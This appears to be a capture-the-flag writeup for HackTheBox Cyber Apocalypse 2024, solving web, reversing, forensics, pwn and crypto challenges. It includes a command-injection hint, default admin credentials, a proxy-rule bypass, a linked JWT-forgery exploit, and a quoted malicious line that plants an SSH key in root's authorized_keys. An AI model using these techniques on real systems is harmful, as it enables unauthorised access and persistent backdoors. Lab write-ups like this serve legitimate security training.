# Hackthebox CyberApocalypse 2024 CTF Writeup

Hello everybody reading this :), this is a writeup on how we solved some of the challenges hosted in the Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories range over Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography.

*NOTE: The challenges were solved by me, @alienX and the others who were in the team :)*

## Web Challenges

### Flag Command (Very Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/HJX-9B3Ta.png)

With the challenge description above, I spawn the docker instance and start solving this challenge!

#### Solution

I open the app in the browser and intercept the requests using Burp Suite. After playing around with the web app by entering the command `start`, I was able to capture some interesting requests:

![image](https://hackmd.io/_uploads/SkNBRB26T.png)

From Burp Suite I was able to retrieve an endpoint, `/api/options`, which dumps all the commands that can be executed:

![image](https://hackmd.io/_uploads/HJ5JL8366.png)

As seen there, one of the commands is **Blip-blop, in a pickle with a hiccup! Shmiggity-shmack**. I proceed by sending that as a command and receive the response with the flag:

![image](https://hackmd.io/_uploads/r1xV4UL2Tp.png)

FLAG: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}

### KORP Terminal (Very Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/r1GksLhT6.png)

#### Solution

I overthought this one a bit, but after spawning the docker instance and opening it in the browser we are presented with a login page.

![image](https://hackmd.io/_uploads/ryxTVjI26a.png)

Using the credentials `admin:password123` I was able to get the flag:

![image](https://hackmd.io/_uploads/SJDKo82T6.png)

FLAG: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

### TimeKORP

#### Description

![image](https://hackmd.io/_uploads/r1bplv2Tp.png)

#### Solution

Provided with the source code, we are required to analyze it and get the flag from the web app.
Opening the web app we are first presented with the output of the current time, and there is a button on the top left saying `What's the date?`:

![image](https://hackmd.io/_uploads/HyiMbv3Tp.png)

Clicking on it, the URI changes to something interesting:

![image](https://hackmd.io/_uploads/BkAPWwn6p.png)

Smells like command injection! Reviewing the source code I could see that the vulnerable point is the `?format=` parameter, and we can perform command injection through it:

![image](https://hackmd.io/_uploads/ByZzGP2a6.png)

Now we can easily escape it by running something such as `;' [command-here]'`:

![image](https://hackmd.io/_uploads/Sk6LMPn6T.png)

FLAG: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}

### Labyrinth Linguist (Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/BJNnfvh66.png)

This was an interesting challenge, as I faced a technology which is rarely seen in real environments. Opening the web application I am greeted by a site asking for input, with some weird text written below it:

![image](https://hackmd.io/_uploads/BJLnww3pT.png)

Providing a sample word, it responds with weird text: that is Voxalith, the translated language. I head back to reviewing the source code:

![image](https://hackmd.io/_uploads/BkmT_Ph66.png)

Then I discovered something interesting: the application renders my input through a template, and the template engine used is **Velocity**, which is vulnerable to SSTI when used the way the source code above does.
After reading multiple articles I came across a working payload; running it I was able to get the flag:

![image](https://hackmd.io/_uploads/ByeKuYw36a.png)

FLAG: HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}

#### References

[Apache Velocity Server Side Template Injection](https://iwconnect.com/apache-velocity-server-side-template-injection/)

### LockTalk (Medium - 300 points)

#### Description

![image](https://hackmd.io/_uploads/rksoSd3p6.png)

#### Solution

We are provided with the source code for download, and spawning the instance runs the web app on a certain host. The web application is more of an API, exposing about three features:

![image](https://hackmd.io/_uploads/SJibLdnaa.png)

Trying to generate a JWT token gives us an unauthorized error:

![image](https://hackmd.io/_uploads/S1ZcLOhTp.png)

Heading back to the source code to review what is going on, we can see that this route is available to the guest user:

![image](https://hackmd.io/_uploads/r1v0IO366.png)

But what's making it say 403? Reading the `haproxy.cfg` file gives us our answer:

![image](https://hackmd.io/_uploads/SJxmDO2Tp.png)

There are two ways to bypass this: the first is by URL-encoding the path `/api/v1/get_ticket`, and the second is by exploiting **CVE-2023-45539**. Let's take a look at both.

**URL ENCODING**

![image](https://hackmd.io/_uploads/Sy1pPd2pT.png)

**CVE-2023-45539**

![image](https://hackmd.io/_uploads/rJ8yOOn6T.png)

Adding a `#` at the end of our URI bypasses the HAProxy configuration rule and provides us with the token. The token uses the algorithm `PS256`.
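Both bypasses above exploit the same weakness: the proxy compared the request target as a raw string before canonicalising it. As an added example (not the challenge's own `haproxy.cfg`, which is only visible in the screenshot above, and not HAProxy's code), the Python below models a deny rule that string-matches the raw target, shows how a percent-encoded path or a trailing `#` slips past it, and shows the hardened form: reject a `#` outright (a fragment has no place in a request target on the wire) and match only the canonical path. The rule set, paths and helper names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed example: a deny rule that should keep guests off this path.
# (Assumption: the real haproxy.cfg rule is only shown in the screenshot above.)
DENIED_PATHS = {"/api/v1/get_ticket"}


def is_denied_raw(request_target: str) -> bool:
    """Weak check: compares the request target exactly as it was received."""
    return request_target in DENIED_PATHS


def has_fragment(request_target: str) -> bool:
    """A '#' is not valid in an HTTP request target; a strict server rejects it."""
    return "#" in request_target


def normalize_path(request_target: str) -> str:
    """Canonicalise a request target before matching it against a rule:
    strip fragment and query, percent-decode until stable (catches double
    encoding), collapse repeated slashes and resolve '.' and '..' segments."""
    path = request_target.split("#", 1)[0].split("?", 1)[0]
    for _ in range(3):  # bounded loop: stops at the first stable decoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r"/+", "/", path)
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_denied_normalized(request_target: str) -> bool:
    """Hardened check: refuse malformed targets, then match the canonical path."""
    if has_fragment(request_target):
        return True  # treated as denied here; a real server would answer 400
    return normalize_path(request_target) in DENIED_PATHS


if __name__ == "__main__":
    for target in ["/api/v1/get_ticket", "/api/v1/get%5fticket",
                   "/api/v1/get_ticket#", "/api/v1/%2567et_ticket"]:
        print(f"{target:28} raw={is_denied_raw(target)!s:5} "
              f"hardened={is_denied_normalized(target)}")
```

Decoding before matching is the key design choice: a deny list that looks at the bytes the client sent is only as strong as the client's willingness to send them plainly, so the comparison has to happen on the same canonical form the backend will eventually route on.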
After a few minutes of google-fu I found **CVE-2022-39227**, which allows an attacker to forge claims from a pregenerated token. Using the exploit at https://github.com/user0x1337/CVE-2022-39227 I was able to generate a token and use it to get the flag:

![image](https://hackmd.io/_uploads/ryjaOuhpT.png)

FLAG: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}

## Reverse Engineering

### BoxCutter (Very Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/H1NtYunaa.png)

#### Solution

This was quick; in less than a minute I had the flag. After downloading the binary I traced every call as the binary executed, and I was able to get the flag from the trace output while analyzing it:

![image](https://hackmd.io/_uploads/HkK_qdnpa.png)

FLAG: HTB{tr4c1ng_th3_c4ll5}

### PackedAway (Very Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/BJbEj_hTa.png)

#### Solution

The name of the challenge itself hints at how to solve it. First I check whether the file is packed by looking for suspicious strings:

![image](https://hackmd.io/_uploads/rkQso_2aT.png)

As seen above, the binary is packed with UPX. I now proceed to decompress it so as to retrieve the original binary:

![image](https://hackmd.io/_uploads/Hy--hdhp6.png)

Using `rabin2` I was able to fetch all readable strings, and among them was the flag:

![image](https://hackmd.io/_uploads/SyOB3u3aT.png)

FLAG: HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}

### LootStash (Very Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/BywOa_n6p.png)

#### Solution

Given that the flag is on the stack, it was easy to get it: fetch all readable strings and grep for the word "HTB":

![image](https://hackmd.io/_uploads/BJAZfF3T6.png)

FLAG: HTB{n33dl3_in_a_l00t_stack}

### Crushing (Easy - 300 points)

#### Description

![image](https://hackmd.io/_uploads/S1hmQt2Ta.png)

## Forensics

### An Unusual Sighting (Very Easy - 300 points)

#### Description
![image](https://hackmd.io/_uploads/rk3qIt2a6.png)

#### Solution

Start an instance and interact with the docker instance to solve the challenge.

![Screenshot from 2024-03-11 11-41-58](https://hackmd.io/_uploads/Sy5ILjnTT.png)

```
FLAG: HTB{B3sT_0f_luck_1n_th3_Fr4y!!}
```

### Urgent (Very Easy - 300 points)

#### Description

![Screenshot 2024-03-11 at 11-05-16 HTB - Capture The Flag](https://hackmd.io/_uploads/SJFap9npT.png)

#### Solution

Another easy forensics challenge, let's take it down. LOL. After unzipping the archive I found an email file with base64-encoded content inside:

```
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/urgent]
└─$ ls
'Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml'   forensics_urgent.zip
```

I found this interesting encoded text:

![Screenshot from 2024-03-11 11-10-40](https://hackmd.io/_uploads/r1DXys3pa.png)

and decided to decode it using CyberChef as follows:

![Screenshot 2024-03-11 at 11-10-19 From Base64 - CyberChef](https://hackmd.io/_uploads/Sk4S1ohTp.png)

If you take a closer look you will see URL-encoded JavaScript. I went straight ahead, copied it and decoded it again using CyberChef, and guess what, b00m:

![Screenshot 2024-03-11 at 11-13-50 URL Decode - CyberChef](https://hackmd.io/_uploads/r1sp1sh6T.png)

```
FLAG: HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}
```

### It Has Begun

#### Description

![Screenshot 2024-03-11 at 11-16-26 HTB - Capture The Flag](https://hackmd.io/_uploads/B1fies3pp.png)

#### Solution

Another easy challenge; I solved this one very fast because it was easy. Let's get the flag. Download the file:

```
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ mv ~/Downloads/forensics_it_has_begun\(2\).zip .

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ unzip forensics_it_has_begun\(2\).zip
Archive:  forensics_it_has_begun(2).zip
  inflating: script.sh
```

We got a bash script, let's read it now:

![Screenshot from 2024-03-11 11-20-33](https://hackmd.io/_uploads/BJ-OWjnap.png)

I looked closely at the script and understood what it does, but within it there are some strange encoded strings. Let's decode them now:

```
echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsM$ +qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys
```

The user part of the key comment, `tS_u0y_ll1w{BTH`, looked very strange to me, so I reversed it:

![Screenshot from 2024-03-11 11-27-29](https://hackmd.io/_uploads/SyXgXs2TT.png)

```
FLAG: HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}
```

## PWN

### Tutorial

#### Description

![Screenshot 2024-03-11 at 13-46-06 HTB - Capture The Flag](https://hackmd.io/_uploads/SJqRm6266.png)

#### Solution

Let's interact with the instance via the netcat command from our terminal.

![Screenshot from 2024-03-11 13-51-40](https://hackmd.io/_uploads/r19TNanp6.png)

The idea behind this challenge is integer overflow. We were given a sample binary written in C so that we can see how to answer the docker instance directly; let's not waste time on this challenge.
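To make the integer overflow idea concrete without the challenge binary (its source is only visible in the screenshots), here is an added example in Python, not code from the challenge: it reproduces what a C `int` does when a sum or product leaves its 32-bit range by letting `ctypes` truncate the value, contrasts that with a checked addition that refuses instead of wrapping, and shows the typical bug pattern where a "total stays under the limit" check passes because the total wrapped negative. All function names and the budget-check scenario are mine.

```python
import ctypes

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def wrap_add_i32(a: int, b: int) -> int:
    """Mimic a C `int` addition: the true sum is truncated to 32 bits,
    so INT32_MAX + 1 silently becomes INT32_MIN (ctypes does the truncation)."""
    return ctypes.c_int32(a + b).value


def wrap_mul_i32(a: int, b: int) -> int:
    """Same truncation for multiplication, the classic `count * sizeof(elem)` trap."""
    return ctypes.c_int32(a * b).value


def as_u32(x: int) -> int:
    """Reinterpret a signed 32-bit value as unsigned: -1 becomes 4294967295,
    which is why a 'negative' length handed to a size_t parameter is huge."""
    return ctypes.c_uint32(x).value


def checked_add_i32(a: int, b: int) -> int:
    """Defensive version: refuse rather than wrap (what __builtin_add_overflow reports)."""
    total = a + b
    if total < INT32_MIN or total > INT32_MAX:
        raise OverflowError(f"{a} + {b} does not fit in int32")
    return total


def overflows_i32(a: int, b: int) -> bool:
    """True when a + b cannot be represented as int32."""
    try:
        checked_add_i32(a, b)
    except OverflowError:
        return True
    return False


def passes_naive_budget_check(amount: int, current: int, limit: int) -> bool:
    """Buggy check written with wrapping arithmetic, `current + amount <= limit`:
    it passes when the sum wraps negative even though amount alone exceeds limit."""
    return wrap_add_i32(current, amount) <= limit


def passes_checked_budget_check(amount: int, current: int, limit: int) -> bool:
    """Fixed check: an overflow is a failure, not a pass."""
    if overflows_i32(current, amount):
        return False
    return current + amount <= limit


if __name__ == "__main__":
    print("INT32_MAX + 1 wraps to", wrap_add_i32(INT32_MAX, 1))
    print("-1 as unsigned is", as_u32(-1))
    print("naive check with huge amount:", passes_naive_budget_check(INT32_MAX, 100, 1000))
    print("checked check with huge amount:", passes_checked_budget_check(INT32_MAX, 100, 1000))
```

The takeaway for reviewing C code is that any comparison involving a sum, product or signed-to-unsigned conversion of attacker-controlled numbers needs an explicit range check before the arithmetic, because the language itself will not complain.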
![Screenshot from 2024-03-11 13-57-34](https://hackmd.io/_uploads/Syswwa2pT.png)

```
flag: HTB{gg_3z_th4nk5_f0r_th3_tut0r14l}
```

#### References

- https://en.wikipedia.org/wiki/Integer_overflow
- https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/

## MISC

### Character (Very Easy - 300 points)

#### Description

![Screenshot 2024-03-11 at 09-57-13 Cyber Apocalypse 2024 Hacker Royale HTB CTF](https://hackmd.io/_uploads/ry1gAYh66.png)

#### Solution

As usual, spawn the docker instance; after starting it we are given an IP address and port, so let's connect via the terminal now.

Command: `nc 94.237.54.161 47922`

As you can see below, we have been given an instance that, once we input an index, gives out the character of the flag at that index. As we all know, the flag starts with `HTB{`:

```
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ nc 94.237.54.161 47922
Which character (index) of the flag do you want?
Enter an index: 0
Character at Index 0: H
Which character (index) of the flag do you want?
Enter an index: 1
Character at Index 1: T
Which character (index) of the flag do you want?
Enter an index: 2
Character at Index 2: B
Which character (index) of the flag do you want?
Enter an index: 3
Character at Index 3: {
Which character (index) of the flag do you want?
Enter an index:
Character at Index 97: l
Which character (index) of the flag do you want?
Enter an index: 98
Character at Index 98: 0
Which character (index) of the flag do you want?
Enter an index: 99
Character at Index 99: n
Which character (index) of the flag do you want?
Enter an index: 10
Character at Index 10: s
Which character (index) of the flag do you want?
Enter an index: 100
Character at Index 100: g
Which character (index) of the flag do you want?
Enter an index: 101
Character at Index 101: !
Which character (index) of the flag do you want?
Enter an index: 102
Character at Index 102: !
Which character (index) of the flag do you want?
Enter an index: 103
Character at Index 103: }
Which character (index) of the flag do you want?
Enter an index:
```

If you continue you will notice that the flag is very long. I did this manually at first, where you could just write a script to automate it by grepping the flag character after every index.

TOTAL NUMBER OF CHARACTERS (0-104)

```
flag: HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!}
```

## Cryptography

### Makeshift

#### Description

![Screenshot 2024-03-11 at 10-15-00 Cyber Apocalypse 2024 Hacker Royale HTB CTF](https://hackmd.io/_uploads/r1JFMcnTp.png)

#### Solution

It's another easy challenge from cryptography. Let's download the file first and see what we can do here.

```
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ unzip crypto_makeshift.zip
Archive:  crypto_makeshift.zip
   creating: challenge/
  inflating: challenge/source.py
 extracting: challenge/output.txt

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ cd challenge

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ ls
output.txt  source.py

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat output.txt
!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py
from secret import FLAG

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)
```

We have been given the ciphertext and the source that produced it: the flag is reversed and each group of three characters is rotated, so we need to undo that. It is very easy because we can use the given source code itself to recover the flag. First I edit the source file, because it cannot run with the `secret` import, which we do not have:

```
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ nano source.py

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py
FLAG = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ python3 source.py
HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}
```

### Dynastic

#### Description

![Screenshot 2024-03-11 at 10-53-37 HTB - Capture The Flag](https://hackmd.io/_uploads/ByhGsq2pT.png)

#### Solution

FLAG

```
HTB{DID_YOU_KNOW_ABOUT_THE_TRITHEMIUS_CIPHER?!_IT_IS_SIMILAR_TO_CAESAR_CIPHER}
```
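Back to the Makeshift challenge above: re-running the given source on the ciphertext printed the flag because that transform happens to be its own inverse. As an added example (not the challenge's own `source.py`), the Python below re-implements the encryption, writes out the explicit inverse (rotate each triple the other way, then reverse) rather than relying on that coincidence, and checks both against the ciphertext from `output.txt`. It also validates the input length, since the original loop raises `IndexError` on a string whose length is not a multiple of three; the function names are mine.

```python
# Ciphertext from the challenge's output.txt, quoted from the listing above.
CIPHERTEXT = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"


def valid_length(s: str) -> bool:
    """The transform only works on strings whose length is a multiple of three."""
    return len(s) % 3 == 0


def _require_valid(s: str) -> None:
    if not valid_length(s):
        raise ValueError(f"length {len(s)} is not a multiple of 3")


def encrypt(flag: str) -> str:
    """The challenge's transform: reverse, then rotate every triple (a,b,c) -> (b,c,a)."""
    _require_valid(flag)
    s = flag[::-1]
    out = []
    for i in range(0, len(s), 3):
        out.append(s[i + 1] + s[i + 2] + s[i])
    return "".join(out)


def decrypt(ct: str) -> str:
    """Explicit inverse: rotate every triple back (b,c,a) -> (a,b,c), then reverse."""
    _require_valid(ct)
    out = []
    for i in range(0, len(ct), 3):
        b, c, a = ct[i], ct[i + 1], ct[i + 2]
        out.append(a + b + c)
    return "".join(out)[::-1]


def is_involution(s: str) -> bool:
    """Why the writeup's shortcut works: reversing the string turns a left
    rotation of each triple into a right rotation of the mirrored triple, so
    encrypt(encrypt(s)) == s whenever len(s) is a multiple of 3."""
    return encrypt(encrypt(s)) == s


if __name__ == "__main__":
    print("decrypt:", decrypt(CIPHERTEXT))
    print("encrypt twice:", encrypt(CIPHERTEXT))
    print("involution:", is_involution(CIPHERTEXT))
```

Writing the inverse out explicitly is the habit worth keeping: it would still have worked had the challenge used a rotation that is not self-inverse (for example, groups of four), where simply re-running the encryptor would not.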